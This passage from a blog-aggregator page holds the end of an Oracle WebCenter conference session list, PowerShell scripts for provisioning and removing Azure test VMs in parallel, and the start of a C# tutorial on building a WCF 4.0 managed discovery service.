This session covers content challenges that affect your business; content consolidation that can lead to savings in storage and administration costs and can lower risks; and how companies are realizing savings. ¶ CON8911 - Improve Online Experiences for Customers and Partners with Self-Service Portals Are you able to provide your customers and partners an easy-to-use online self-service experience? Are you processing high-volume transactions and struggling with call center bottlenecks or back-end systems that won’t integrate, causing order delays and customer frustration? Are you looking to target content such as product and service offerings to your end users? This session shares approaches to providing targeted delivery as well as strategies and best practices for transforming your business by providing an intuitive user experience for your customers and partners. ¶ CON6156 - Top 10 Ways to Integrate Oracle WebCenter Content This session covers 10 common ways to integrate Oracle WebCenter Content with other enterprise applications and middleware. It discusses out-of-the-box modules that provide expanded features in Oracle WebCenter Content—such as enterprise search, SOA, and BPEL—as well as developer tools you can use to create custom integrations. The presentation also gives guidance on which integration option may work best in your environment. ¶ HOL10207 - Build an Intranet Portal with Oracle WebCenter In this hands-on lab, you’ll work with Oracle WebCenter Portal and Oracle WebCenter Content to build out an enterprise portal that maximizes the productivity of teams and individual contributors. Using browser-based tools, you’ll manage site resources such as page styles, templates, and navigation. You’ll edit content stored in Oracle WebCenter Content directly from your portal. You’ll also experience the latest features that promote collaboration, social networking, and personal productivity. ¶ CON7817 - Migration to Oracle WebCenter Imaging 11g Customers today continually strive to automate business processes, reduce costs, and improve efficiency. The accounts payable process—which is often distributed in nature, requires many approvals, and generates huge volumes of paper invoices—is automated by many customers. In this session, learn how Oracle and SYSTIME have partnered to help a customer migrate its existing Oracle Imaging and Process Management Release 7.6 to the latest Oracle WebCenter Imaging 11g and integrate it with Oracle’s JD Edwards family of products. ¶ CON8910 - How to Engage Customers Across Web, Mobile, and Social Channels Whether on desktops at the office, on tablets at home, or on mobile phones when on the go, today’s customers are always connected. To engage today’s customers, you need to make the online customer experience connected and consistent across a host of devices and multiple channels, including Web, mobile, and social networks. Managing this multichannel environment can result in lots of headaches without the right tools. Attend this session to learn how Oracle WebCenter Sites solves the challenge of multichannel customer engagement. ¶ HOL10206 - Oracle WebCenter Sites 11g: Transforming the Content Contributor Experience Oracle WebCenter Sites 11g makes it easy for marketers and business users to contribute to and manage Websites with the new visual, contextual, and intuitive Web authoring interface. In this hands-on lab, you will create and manage content for a sports-themed Website, using many of the new and enhanced features of the 11g release. 
¶ CON8900 - Building Next-Generation Portals: An Interactive Customer Panel Discussion Social and collaborative technologies have changed how people interact, learn, and collaborate, and providing a modern, social Web presence is imperative to remain competitive in today’s market. Can your business benefit from a more collaborative and interactive portal environment for employees, customers, and partners? Attend this session to hear from Oracle WebCenter Portal customers as they share their strategies and best practices for providing users with a modern experience that adapts to their needs and includes personalized access to content in context. The panel also addresses how customers have benefited from creating next-generation portals by migrating from older portal technologies to Oracle WebCenter Portal. ¶ CON9625 - Taking Control of Oracle WebCenter Security Organizations are increasingly looking to extend their Oracle WebCenter portal for social business, to serve external users and provide seamless access to the right information. In particular, many organizations are extending Oracle WebCenter in a business-to-business scenario requiring secure identification and authorization of business partners and their users. This session focuses on how customers are leveraging, securing, and providing access control to Oracle WebCenter portal and mobile solutions. You will learn best practices and hear real-world examples of how to provide flexible and granular access control for Oracle WebCenter deployments, using Oracle Platform Security Services and Oracle Access Management Suite product offerings. ¶ CON8891 - Extending Social into Enterprise Applications and Business Processes Oracle Social Network is an extensible social platform that enables contextual collaboration within enterprise applications and business processes, providing relevant data from across various enterprise systems in one place. Attend this session to see how an Oracle Social Network customer is integrating multiple applications—such as CRM, HCM, and business processes—into Oracle Social Network and Oracle WebCenter to enable individuals and teams to solve complex cross-organizational business problems more effectively by utilizing the social enterprise. ¶ Thursday, October 4th CON8899 - Becoming a Social Business: Stories from the Front Lines of Change What does it really mean to be a social business? How can you change your organization to embrace social approaches? What pitfalls do you need to avoid? In this lively panel discussion, customer and industry thought leaders in social business explore these topics and more as they share their stories of the good, the bad, and the ugly that can happen when embracing social methods and technologies to improve business success. Using moderated questions and open Q&A from the audience, the panel discusses vital topics such as the critical factors for success, the major issues to avoid, how to gain senior executive support for social efforts, how to handle undesired behavior, and how to measure business impact. It takes a thought-provoking look at becoming a social business from the inside. ¶ CON6851 - Oracle WebCenter and Oracle Business Intelligence Enterprise Edition to Create Vendor Portals Large manufacturers of grocery items routinely find themselves depending on the inventory management expertise of their wholesalers and distributors. 
Inventory costs can be managed more efficiently by the manufacturers if they have better insight into the inventory levels of items carried by their distributors. This creates a unique opportunity for distributors and wholesalers to leverage this knowledge into a revenue-generating subscription service. Oracle Business Intelligence Enterprise Edition and Oracle WebCenter Portal play a key part in enabling creation of business-managed business intelligence portals for vendors. This session discusses one customer that implemented this by leveraging Oracle WebCenter and Oracle Business Intelligence Enterprise Edition. ¶ CON8879 - Provide a Personalized and Consistent Customer Experience in Your Websites and Portals Your customers engage with your company online in different ways throughout their journey—from prospecting by acquiring information on your corporate Website to transacting through self-service applications on your customer portal—and then the cycle begins again when they look for new products and services. Ensuring that the customer experience is consistent and personalized across online properties—from branding and content to interactions and transactions—can be a daunting task. Oracle WebCenter enables you to speak and interact with your customers with one voice across your Websites and portals by providing an integrated platform for delivery of self-service and engagement that unifies and personalizes the online experience. Learn more in this session. ¶ CON8898 - Land Mines, Potholes, and Dirt Roads: Navigating the Way to ECM Nirvana Ten years ago, people were predicting that by this time in history, we’d be some kind of utopian paperless society. As we all know, we’re not there yet, but are we getting closer? What is keeping companies from driving down the road to enterprise content management bliss? Most people understand that using ECM as a central platform enables organizations to expedite document-centric processes, but most business processes in organizations are still heavily paper-based. Many of these processes could be automated and improved with an ECM platform infrastructure. In this panel discussion, you’ll hear from Oracle WebCenter customers that have already solved some of these challenges as they share their strategies for success and roads to avoid along your journey. ¶ CON8908 - Oracle WebCenter Portal: Creating and Using Content Presenter Templates Oracle WebCenter Portal applications use task flows to display and integrate content stored in the Oracle WebCenter Content server. Among the most flexible task flows is Content Presenter, which renders various types of content on an Oracle WebCenter Portal page. Although Oracle WebCenter Portal comes with a set of predefined Content Presenter templates, developers can create their own templates for specific rendering needs. This session shows the lifecycle of developing Content Presenter task flows, including how to create, package, import, modify at runtime, and use such templates. In addition to simple examples with Oracle Application Development Framework (Oracle ADF) UI elements to render the content, it shows how to use other UI technologies, CSS files, and JavaScript libraries. 
¶ CON8897 - Using Web Experience Management to Drive Online Marketing Success Every year, the online channel becomes more imperative for driving organizational top-line revenue, but for many companies, mastering how to best market their products and services in a fast-evolving online world with high customer expectations for personalized experiences can be a complex proposition. Come to this panel discussion, and hear directly from online marketers how they are succeeding today by using Web experience management to drive marketing success, using capabilities such as targeting and optimization, user-generated content, mobile site publishing, and site visitor personalization to deliver engaging online experiences. ¶ CON8892 - Oracle’s Journey to Social Business Social business is a revolution, one that is causing rapidly accelerating change in how companies and customers engage with one another and how employees work together. Oracle’s goal in becoming a social business is to create a socially connected organization in which working collaboratively across geographical locations, lines of business, and management chains is second nature, enabling innovative solutions to business challenges. We can achieve this by connecting the right people, finding the right content, communicating with the right people, collaborating at the right time, and building the right communities in the right context—all ready in the CLOUD. Attend this session to see how Oracle is transforming itself into a social business. ¶  ------------ If you've read all the way to the end here - we are REALLY looking forward to seeing you in San Francisco.

    Read the article

  • PowerShell Script to Deploy Multiple VM on Azure in Parallel #azure #powershell

    - by Marco Russo (SQLBI)
    This blog is usually dedicated to Business Intelligence and SQL Server, but I couldn’t easily find simple PowerShell scripts on the web to help me deploy a number of virtual machines on Azure for testing and development. Since I need to deploy, start, stop and remove many virtual machines created from a common image of mine (you know, Tabular is not part of the standard images provided by Microsoft…), I wanted to minimize the time required to execute every operation from my Windows Azure PowerShell console (though I suggest using Windows PowerShell ISE), so I also wanted to fire the commands in parallel as soon as possible, without losing their output in the console. To execute multiple commands in parallel, I used the Start-Job cmdlet; with Get-Job and Receive-Job I wait for job completion and display the messages generated during background command execution. This technique reduces execution time when I have to deploy, start, stop or remove virtual machines. Please note that a few operations on Azure acquire an exclusive lock and cannot really execute in parallel, but only part of their execution time is subject to this lock, so you still obtain a better response time in these scenarios (this is the case when provisioning a new VM). Finally, after you remove the VMs you still have to remove the disks that contained them. This cannot be done right after the VM removal, because you have to wait until the removal operation has completed on Azure. So I wrote a script to run a few minutes after VM removal that deletes the disks (and VHDs) no longer related to a VM. I only check that a disk was associated with the original image name used to provision the VMs (so I don’t remove disks deployed by other batches that I might want to preserve). These examples are specific to my scenario; if you need a more complex configuration, you will have to change and adapt the code. But if all you need is to create multiple instances of the same VM running in a workgroup, these scripts should be good enough. I prepared the following PowerShell scripts:

    ProvisionVMs: Provisions many VMs in parallel starting from the same image. It creates one service for each VM.
    RemoveVMs: Removes all the VMs in parallel – it also removes the service created for each VM.
    StartVMs: Starts all the VMs in parallel.
    StopVMs: Stops all the VMs in parallel.
    RemoveOrphanDisks: Removes all the disks no longer used by any VM. Run this script a few minutes after the RemoveVMs script.
ProvisionVMs

# Name of subscription
$SubscriptionName = "Copy the SubscriptionName property you get from Get-AzureSubscription"

# Name of storage account (where VMs will be deployed)
$StorageAccount = "Copy the Label property you get from Get-AzureStorageAccount"

function ProvisionVM( [string]$VmName ) {
    Start-Job -ArgumentList $VmName {
        param($VmName)
        $Location = "Copy the Location property you get from Get-AzureStorageAccount"
        $InstanceSize = "A5" # You can use any other instance, such as Large, A6, and so on
        $AdminUsername = "UserName" # Write the name of the administrator account in the new VM
        $Password = "Password"      # Write the password of the administrator account in the new VM
        $Image = "Copy the ImageName property you get from Get-AzureVMImage"
        # You can list your own images using the following command:
        # Get-AzureVMImage | Where-Object {$_.PublisherName -eq "User" }

        New-AzureVMConfig -Name $VmName -ImageName $Image -InstanceSize $InstanceSize |
            Add-AzureProvisioningConfig -Windows -Password $Password -AdminUsername $AdminUsername |
            New-AzureVM -Location $Location -ServiceName "$VmName" -Verbose
    }
}

# Set the proper storage - you might remove this line if you have only one storage in the subscription
Set-AzureSubscription -SubscriptionName $SubscriptionName -CurrentStorageAccount $StorageAccount

# Select the subscription - this line is fundamental if you have access to multiple subscriptions
# You might remove this line if you have only one subscription
Select-AzureSubscription -SubscriptionName $SubscriptionName

# Every line in the following list provisions one VM using the name specified in the argument
# You can change the number of lines - use a unique name for every VM - don't reuse names
# already used in other VMs already deployed
ProvisionVM "test10"
ProvisionVM "test11"
ProvisionVM "test12"
ProvisionVM "test13"
ProvisionVM "test14"
ProvisionVM "test15"
ProvisionVM "test16"
ProvisionVM "test17"
ProvisionVM "test18"
ProvisionVM "test19"
ProvisionVM "test20"

# Wait for all to complete
While (Get-Job -State "Running") {
    Get-Job -State "Completed" | Receive-Job
    Start-Sleep 1
}

# Display output from all jobs
Get-Job | Receive-Job

# Cleanup of jobs
Remove-Job *

# Displays batch completed
echo "Provisioning VM Completed"

RemoveVMs

# Name of subscription
$SubscriptionName = "Copy the SubscriptionName property you get from Get-AzureSubscription"

function RemoveVM( [string]$VmName ) {
    Start-Job -ArgumentList $VmName {
        param($VmName)
        Remove-AzureService -ServiceName $VmName -Force -Verbose
    }
}

# Select the subscription - this line is fundamental if you have access to multiple subscriptions
# You might remove this line if you have only one subscription
Select-AzureSubscription -SubscriptionName $SubscriptionName

# Every line in the following list removes one VM using the name specified in the argument
# You can change the number of lines - use a unique name for every VM - don't reuse names
# already used in other VMs already deployed
RemoveVM "test10"
RemoveVM "test11"
RemoveVM "test12"
RemoveVM "test13"
RemoveVM "test14"
RemoveVM "test15"
RemoveVM "test16"
RemoveVM "test17"
RemoveVM "test18"
RemoveVM "test19"
RemoveVM "test20"

# Wait for all to complete
While (Get-Job -State "Running") {
    Get-Job -State "Completed" | Receive-Job
    Start-Sleep 1
}

# Display output from all jobs
Get-Job | Receive-Job

# Cleanup
Remove-Job *

# Displays batch completed
echo "Remove VM Completed"

StartVMs

# Name of subscription
$SubscriptionName = "Copy the SubscriptionName property you get from Get-AzureSubscription"

function StartVM( [string]$VmName ) {
    Start-Job -ArgumentList $VmName {
        param($VmName)
        Start-AzureVM -Name $VmName -ServiceName $VmName -Verbose
    }
}

# Select the subscription - this line is fundamental if you have access to multiple subscriptions
# You might remove this line if you have only one subscription
Select-AzureSubscription -SubscriptionName $SubscriptionName

# Every line in the following list starts one VM using the name specified in the argument
# You can change the number of lines - use a unique name for every VM - don't reuse names
# already used in other VMs already deployed
StartVM "test10"
StartVM "test11"
StartVM "test12"
StartVM "test13"
StartVM "test14"
StartVM "test15"
StartVM "test16"
StartVM "test17"
StartVM "test18"
StartVM "test19"
StartVM "test20"

# Wait for all to complete
While (Get-Job -State "Running") {
    Get-Job -State "Completed" | Receive-Job
    Start-Sleep 1
}

# Display output from all jobs
Get-Job | Receive-Job

# Cleanup
Remove-Job *

# Displays batch completed
echo "Start VM Completed"

StopVMs

# Name of subscription
$SubscriptionName = "Copy the SubscriptionName property you get from Get-AzureSubscription"

function StopVM( [string]$VmName ) {
    Start-Job -ArgumentList $VmName {
        param($VmName)
        Stop-AzureVM -Name $VmName -ServiceName $VmName -Verbose -Force
    }
}

# Select the subscription - this line is fundamental if you have access to multiple subscriptions
# You might remove this line if you have only one subscription
Select-AzureSubscription -SubscriptionName $SubscriptionName

# Every line in the following list stops one VM using the name specified in the argument
# You can change the number of lines - use a unique name for every VM - don't reuse names
# already used in other VMs already deployed
StopVM "test10"
StopVM "test11"
StopVM "test12"
StopVM "test13"
StopVM "test14"
StopVM "test15"
StopVM "test16"
StopVM "test17"
StopVM "test18"
StopVM "test19"
StopVM "test20"

# Wait for all to complete
While (Get-Job -State "Running") {
    Get-Job -State "Completed" | Receive-Job
    Start-Sleep 1
}

# Display output from all jobs
Get-Job | Receive-Job

# Cleanup
Remove-Job *

# Displays batch completed
echo "Stop VM Completed"

RemoveOrphanDisks

$ImageName = "Copy the ImageName property you get from Get-AzureVMImage"
# You can list your own images using the following command:
# Get-AzureVMImage | Where-Object {$_.PublisherName -eq "User" }

# Remove all orphan disks coming from the image specified in $ImageName
Get-AzureDisk |
    Where-Object {$_.AttachedTo -eq $null -and $_.SourceImageName -eq $ImageName} |
    Remove-AzureDisk -DeleteVHD -Verbose

    Read the article

  • Service Discovery in WCF 4.0 – Part 1

    - by Shaun
    When designing a service-oriented architecture (SOA) system, there will be a lot of services with many service contracts, endpoints and behaviors. Besides clients calling the services, in a large distributed system a service may also invoke other services, so a service might need to know the endpoints of the services it depends on. This is hardly a problem in a small system, but once you have more than 10 services it becomes one. For example, in my current product there are around 10 services, such as the user authentication service, UI integration service, location service, license service, device monitor service, event monitor service, schedule job service, accounting service, player management service, etc.

Benefit of Discovery Service

Almost all my services need to invoke at least one other service, so it would be a difficult task to make sure all service endpoints are configured correctly in every service. Furthermore, it would be a nightmare if a service changed its endpoint at runtime. Hence, we need a discovery service to remove this dependency (a configuration dependency). A discovery service acts as a service dictionary that stores the relationship between contracts and endpoints for every service. Using the discovery service, when service X wants to invoke service Y, it just asks the discovery service where service Y is; the discovery service returns all suitable endpoints of service Y, and service X uses one of them to send its request. When a service changes its endpoint address, all it has to do is update its record in the discovery service, and every other service will learn the new endpoint.

WCF 4.0 Discovery supports both a managed proxy discovery mode and an ad-hoc discovery mode. In ad-hoc mode there is no standalone discovery service: when a client wants to invoke a service, it broadcasts a message (normally over UDP) to the entire network with the service match criteria. All services that have the discovery behavior enabled receive this message, and only the matching ones send their endpoints back to the client. The managed proxy discovery service works as I described above. In this post I will only cover the managed proxy mode, where there is a standalone discovery service. For more information about the ad-hoc mode please refer to the MSDN.

Service Announcement and Probe

The main job of a discovery service is to return the proper endpoint addresses to whoever is looking for them. In most cases the consuming service (acting as a client) sends the discovery service the contract it wants to call, and the discovery service finds the endpoints and responds. Sometimes contract and endpoint are not enough; the metadata can also carry versioning and extension attributes. In this post I will only cover the case with contract and endpoint. When a client (or a service that needs to invoke another service) wants to connect to a target service, it first asks the discovery service through the "Probe" operation, passing its criteria. Basically the criteria contain the contract type name of the target service. The discovery service then searches its endpoint repository by these criteria; the repository might be a database, a distributed cache or a flat XML file. For each match, the discovery service grabs the endpoint information (called discovery endpoint metadata in WCF) and sends it back. This is called "Probe". The sketch below previews what such a probe looks like from the client side.
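Here is a minimal sketch of a client-side probe, assuming a service contract named IStringService (the sample contract defined later in this post); the Duration and MaxResults values are illustrative assumptions, not taken from the original article.

using System;
using System.ServiceModel;
using System.ServiceModel.Discovery;

class ProbeSketch
{
    // Ask the discovery service for an endpoint implementing IStringService.
    static EndpointAddress Probe(DiscoveryEndpoint probeEndpoint)
    {
        using (var client = new DiscoveryClient(probeEndpoint))
        {
            var criteria = new FindCriteria(typeof(IStringService)) // contract assumed from later in the post
            {
                Duration = TimeSpan.FromSeconds(5), // stop searching after 5 seconds
                MaxResults = 1                      // one endpoint is enough here
            };
            FindResponse response = client.Find(criteria);
            return response.Endpoints.Count > 0 ? response.Endpoints[0].Address : null;
        }
    }
}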
Finally, the client receives the discovery endpoint metadata and uses the endpoint to connect to the target service. Besides the probe, the discovery service must also take responsibility for knowing that a new service is available when it goes online, and that it stopped when it goes offline. This feature is named "Announcement": when a service starts or stops, it announces itself to the discovery service. So the basic functionality of a discovery service includes:
1. An endpoint that receives the service online message and adds the service endpoint information to the discovery repository.
2. An endpoint that receives the service offline message and removes the service endpoint information from the discovery repository.
3. An endpoint that receives the client probe message, finds the matching services, and returns their discovery endpoint metadata.
WCF 4.0 covers all these features in its discovery infrastructure classes.

Discovery Service in WCF 4.0

WCF 4.0 introduced a new assembly named System.ServiceModel.Discovery, which has all the classes and interfaces necessary to build a WS-Discovery-compliant discovery service. It supports the ad-hoc and managed proxy modes. For the case discussed in this post, what we need to build is a standalone discovery service, i.e. the managed proxy discovery mode. To build a managed discovery service in WCF 4.0, just create a new class that inherits from the abstract class System.ServiceModel.Discovery.DiscoveryProxy. This class implements and abstracts the procedures of service announcement and probe, and it exposes 8 abstract methods in which we can implement our own endpoint registration, unregistration and find logic. These 8 methods are asynchronous, which means all invocations of the discovery service happen asynchronously, for better scalability and performance.
1. OnBeginOnlineAnnouncement, OnEndOnlineAnnouncement: invoked when a service sends the online announcement message. We add the endpoint information to the repository here.
2. OnBeginOfflineAnnouncement, OnEndOfflineAnnouncement: invoked when a service sends the offline announcement message. We remove the endpoint information from the repository here.
3. OnBeginFind, OnEndFind: invoked when a client sends a probe message to find service endpoint information. We look for the proper endpoints by matching the client’s criteria against the repository here.
4. OnBeginResolve, OnEndResolve: invoked when a client sends a resolve message. Unlike find, resolve returns exactly one service endpoint metadata entry to the client. In our example we will NOT implement this method.

Let’s create our own discovery service by inheriting from the base System.ServiceModel.Discovery.DiscoveryProxy. We also need to specify the service behavior on this class: since the built-in discovery service host class only supports singleton mode, we must set its instance context mode to Single.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.ServiceModel.Discovery;
using System.ServiceModel;

namespace Phare.Service
{
    [ServiceBehavior(InstanceContextMode = InstanceContextMode.Single, ConcurrencyMode = ConcurrencyMode.Multiple)]
    public class ManagedProxyDiscoveryService : DiscoveryProxy
    {
        protected override IAsyncResult OnBeginFind(FindRequestContext findRequestContext, AsyncCallback callback, object state)
        {
            throw new NotImplementedException();
        }

        protected override IAsyncResult OnBeginOfflineAnnouncement(DiscoveryMessageSequence messageSequence, EndpointDiscoveryMetadata endpointDiscoveryMetadata, AsyncCallback callback, object state)
        {
            throw new NotImplementedException();
        }

        protected override IAsyncResult OnBeginOnlineAnnouncement(DiscoveryMessageSequence messageSequence, EndpointDiscoveryMetadata endpointDiscoveryMetadata, AsyncCallback callback, object state)
        {
            throw new NotImplementedException();
        }

        protected override IAsyncResult OnBeginResolve(ResolveCriteria resolveCriteria, AsyncCallback callback, object state)
        {
            throw new NotImplementedException();
        }

        protected override void OnEndFind(IAsyncResult result)
        {
            throw new NotImplementedException();
        }

        protected override void OnEndOfflineAnnouncement(IAsyncResult result)
        {
            throw new NotImplementedException();
        }

        protected override void OnEndOnlineAnnouncement(IAsyncResult result)
        {
            throw new NotImplementedException();
        }

        protected override EndpointDiscoveryMetadata OnEndResolve(IAsyncResult result)
        {
            throw new NotImplementedException();
        }
    }
}

Now let’s implement the online, offline and find methods one by one. The WCF discovery infrastructure gives us full flexibility to implement the endpoint add, remove and find logic. For demo purposes we will use an in-memory dictionary to store the services’ endpoint metadata; in the next post we will see how to serialize and store this information in a database. Define a concurrent dictionary inside the service class, since it will be used from multiple threads (note the added using directive for System.Collections.Concurrent, which ConcurrentDictionary requires):

using System.Collections.Concurrent;

[ServiceBehavior(InstanceContextMode = InstanceContextMode.Single, ConcurrencyMode = ConcurrencyMode.Multiple)]
public class ManagedProxyDiscoveryService : DiscoveryProxy
{
    private ConcurrentDictionary<EndpointAddress, EndpointDiscoveryMetadata> _services;

    public ManagedProxyDiscoveryService()
    {
        _services = new ConcurrentDictionary<EndpointAddress, EndpointDiscoveryMetadata>();
    }
}

Then we can simply implement the logic of service online and offline.
protected override IAsyncResult OnBeginOnlineAnnouncement(DiscoveryMessageSequence messageSequence, EndpointDiscoveryMetadata endpointDiscoveryMetadata, AsyncCallback callback, object state)
{
    _services.AddOrUpdate(endpointDiscoveryMetadata.Address, endpointDiscoveryMetadata, (key, value) => endpointDiscoveryMetadata);
    return new OnOnlineAnnouncementAsyncResult(callback, state);
}

protected override void OnEndOnlineAnnouncement(IAsyncResult result)
{
    OnOnlineAnnouncementAsyncResult.End(result);
}

protected override IAsyncResult OnBeginOfflineAnnouncement(DiscoveryMessageSequence messageSequence, EndpointDiscoveryMetadata endpointDiscoveryMetadata, AsyncCallback callback, object state)
{
    EndpointDiscoveryMetadata endpoint = null;
    _services.TryRemove(endpointDiscoveryMetadata.Address, out endpoint);
    return new OnOfflineAnnouncementAsyncResult(callback, state);
}

protected override void OnEndOfflineAnnouncement(IAsyncResult result)
{
    OnOfflineAnnouncementAsyncResult.End(result);
}

Regarding the find method, the FindRequestContext.Criteria parameter has a method named IsMatch, which we can use to evaluate which service metadata satisfies the criteria. So the implementation of the find method looks like this:

protected override IAsyncResult OnBeginFind(FindRequestContext findRequestContext, AsyncCallback callback, object state)
{
    _services.Where(s => findRequestContext.Criteria.IsMatch(s.Value))
             .Select(s => s.Value)
             .All(meta =>
             {
                 findRequestContext.AddMatchingEndpoint(meta);
                 return true;
             });
    return new OnFindAsyncResult(callback, state);
}

protected override void OnEndFind(IAsyncResult result)
{
    OnFindAsyncResult.End(result);
}

As you can see, we check all the endpoint metadata in the repository by invoking the IsMatch method and add every matching entry to the request context. Finally, since all these methods are asynchronous, we need some AsyncResult classes as well. Below are the base class and the derived classes used in the methods above.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading;

namespace Phare.Service
{
    abstract internal class AsyncResult : IAsyncResult
    {
        AsyncCallback callback;
        bool completedSynchronously;
        bool endCalled;
        Exception exception;
        bool isCompleted;
        ManualResetEvent manualResetEvent;
        object state;
        object thisLock;

        protected AsyncResult(AsyncCallback callback, object state)
        {
            this.callback = callback;
            this.state = state;
            this.thisLock = new object();
        }

        public object AsyncState
        {
            get { return state; }
        }

        public WaitHandle AsyncWaitHandle
        {
            get
            {
                if (manualResetEvent != null)
                {
                    return manualResetEvent;
                }
                lock (ThisLock)
                {
                    if (manualResetEvent == null)
                    {
                        manualResetEvent = new ManualResetEvent(isCompleted);
                    }
                }
                return manualResetEvent;
            }
        }

        public bool CompletedSynchronously
        {
            get { return completedSynchronously; }
        }

        public bool IsCompleted
        {
            get { return isCompleted; }
        }

        object ThisLock
        {
            get { return this.thisLock; }
        }

        protected static TAsyncResult End<TAsyncResult>(IAsyncResult result)
            where TAsyncResult : AsyncResult
        {
            if (result == null)
            {
                throw new ArgumentNullException("result");
            }

            TAsyncResult asyncResult = result as TAsyncResult;

            if (asyncResult == null)
            {
                throw new ArgumentException("Invalid async result.", "result");
            }

            if (asyncResult.endCalled)
            {
                throw new InvalidOperationException("Async object already ended.");
            }

            asyncResult.endCalled = true;

            if (!asyncResult.isCompleted)
            {
                asyncResult.AsyncWaitHandle.WaitOne();
            }

            if (asyncResult.manualResetEvent != null)
            {
                asyncResult.manualResetEvent.Close();
            }

            if (asyncResult.exception != null)
            {
                throw asyncResult.exception;
            }

            return asyncResult;
        }

        protected void Complete(bool completedSynchronously)
        {
            if (isCompleted)
            {
                throw new InvalidOperationException("This async result is already completed.");
            }

            this.completedSynchronously = completedSynchronously;

            if (completedSynchronously)
            {
                this.isCompleted = true;
            }
            else
            {
                lock (ThisLock)
                {
                    this.isCompleted = true;
                    if (this.manualResetEvent != null)
                    {
                        this.manualResetEvent.Set();
                    }
                }
            }

            if (callback != null)
            {
                callback(this);
            }
        }

        protected void Complete(bool completedSynchronously, Exception exception)
        {
            this.exception = exception;
            Complete(completedSynchronously);
        }
    }
}

using System;
using System.ServiceModel.Discovery;

namespace Phare.Service
{
    internal sealed class OnOnlineAnnouncementAsyncResult : AsyncResult
    {
        public OnOnlineAnnouncementAsyncResult(AsyncCallback callback, object state)
            : base(callback, state)
        {
            this.Complete(true);
        }

        public static void End(IAsyncResult result)
        {
            AsyncResult.End<OnOnlineAnnouncementAsyncResult>(result);
        }
    }

    sealed class OnOfflineAnnouncementAsyncResult : AsyncResult
    {
        public OnOfflineAnnouncementAsyncResult(AsyncCallback callback, object state)
            : base(callback, state)
        {
            this.Complete(true);
        }

        public static void End(IAsyncResult result)
        {
            AsyncResult.End<OnOfflineAnnouncementAsyncResult>(result);
        }
    }

    sealed class OnFindAsyncResult : AsyncResult
    {
        public OnFindAsyncResult(AsyncCallback callback, object state)
            : base(callback, state)
        {
            this.Complete(true);
        }

        public static void End(IAsyncResult result)
        {
            AsyncResult.End<OnFindAsyncResult>(result);
        }
    }

    sealed class OnResolveAsyncResult : AsyncResult
    {
        EndpointDiscoveryMetadata matchingEndpoint;

        public OnResolveAsyncResult(EndpointDiscoveryMetadata matchingEndpoint, AsyncCallback callback, object state)
            : base(callback, state)
        {
            this.matchingEndpoint = matchingEndpoint;
            this.Complete(true);
        }

        public static EndpointDiscoveryMetadata End(IAsyncResult result)
        {
            OnResolveAsyncResult thisPtr = AsyncResult.End<OnResolveAsyncResult>(result);
            return thisPtr.matchingEndpoint;
        }
    }
}

Now we have finished the discovery service; the next step is to host it. The discovery service is a standard WCF service, so we can host it with ServiceHost in a console application, a Windows service, or in IIS as usual. The following code hosts the discovery service we just created in a console application.

static void Main(string[] args)
{
    using (var host = new ServiceHost(new ManagedProxyDiscoveryService()))
    {
        host.Opened += (sender, e) =>
        {
            host.Description.Endpoints.All((ep) =>
            {
                Console.WriteLine(ep.ListenUri);
                return true;
            });
        };

        try
        {
            // retrieve the announcement and probe endpoints and the binding from configuration
            var announcementEndpointAddress = new EndpointAddress(ConfigurationManager.AppSettings["announcementEndpointAddress"]);
            var probeEndpointAddress = new EndpointAddress(ConfigurationManager.AppSettings["probeEndpointAddress"]);
            var binding = Activator.CreateInstance(Type.GetType(ConfigurationManager.AppSettings["bindingType"], true, true)) as Binding;
            var announcementEndpoint = new AnnouncementEndpoint(binding, announcementEndpointAddress);
            var probeEndpoint = new DiscoveryEndpoint(binding, probeEndpointAddress);
            probeEndpoint.IsSystemEndpoint = false;
            // append the service endpoints for announcement and probe
            host.AddServiceEndpoint(announcementEndpoint);
            host.AddServiceEndpoint(probeEndpoint);

            host.Open();

            Console.WriteLine("Press any key to exit.");
            Console.ReadKey();
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.ToString());
        }
    }

    Console.WriteLine("Done.");
    Console.ReadKey();
}

Note that the discovery service needs two endpoints, one for announcement and one for probe. In this example I retrieve their addresses from the configuration file, and I specify the binding of these two endpoints in the configuration file as well.
<?xml version="1.0"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>
  </startup>
  <appSettings>
    <add key="announcementEndpointAddress" value="net.tcp://localhost:10010/announcement"/>
    <add key="probeEndpointAddress" value="net.tcp://localhost:10011/probe"/>
    <add key="bindingType" value="System.ServiceModel.NetTcpBinding, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"/>
  </appSettings>
</configuration>

And this is the console screen when I ran my discovery service. As you can see, there are two endpoints listening, one for announcement messages and one for probe messages.

Discoverable Service and Client

Next, let’s create a WCF service that is discoverable, i.e. one that can be found by the discovery service. To do so, the service must send an online announcement message to the discovery service when it starts, and an offline message before it shuts down. Let’s create a simple service that converts an incoming string to uppercase. The service contract and implementation look like this:

[ServiceContract]
public interface IStringService
{
    [OperationContract]
    string ToUpper(string content);
}

public class StringService : IStringService
{
    public string ToUpper(string content)
    {
        return content.ToUpper();
    }
}

Then host this service in a console application. To make the discovery service easy to test, the service address changes each time the host starts.

static void Main(string[] args)
{
    var baseAddress = new Uri(string.Format("net.tcp://localhost:11001/stringservice/{0}/", Guid.NewGuid().ToString()));

    using (var host = new ServiceHost(typeof(StringService), baseAddress))
    {
        host.Opened += (sender, e) =>
        {
            Console.WriteLine("Service opened at {0}", host.Description.Endpoints.First().ListenUri);
        };

        host.AddServiceEndpoint(typeof(IStringService), new NetTcpBinding(), string.Empty);

        host.Open();

        Console.WriteLine("Press any key to exit.");
        Console.ReadKey();
    }
}

Currently this service is NOT discoverable. We need to add a special service behavior so that it sends the online and offline messages to the discovery service announcement endpoint when the host is opened and closed. WCF 4.0 introduced a service behavior named ServiceDiscoveryBehavior: once we specify the announcement endpoint address and append the behavior to the service, the service becomes discoverable.

var announcementAddress = new EndpointAddress(ConfigurationManager.AppSettings["announcementEndpointAddress"]);
var announcementBinding = Activator.CreateInstance(Type.GetType(ConfigurationManager.AppSettings["bindingType"], true, true)) as Binding;
var announcementEndpoint = new AnnouncementEndpoint(announcementBinding, announcementAddress);
var discoveryBehavior = new ServiceDiscoveryBehavior();
discoveryBehavior.AnnouncementEndpoints.Add(announcementEndpoint);
host.Description.Behaviors.Add(discoveryBehavior);

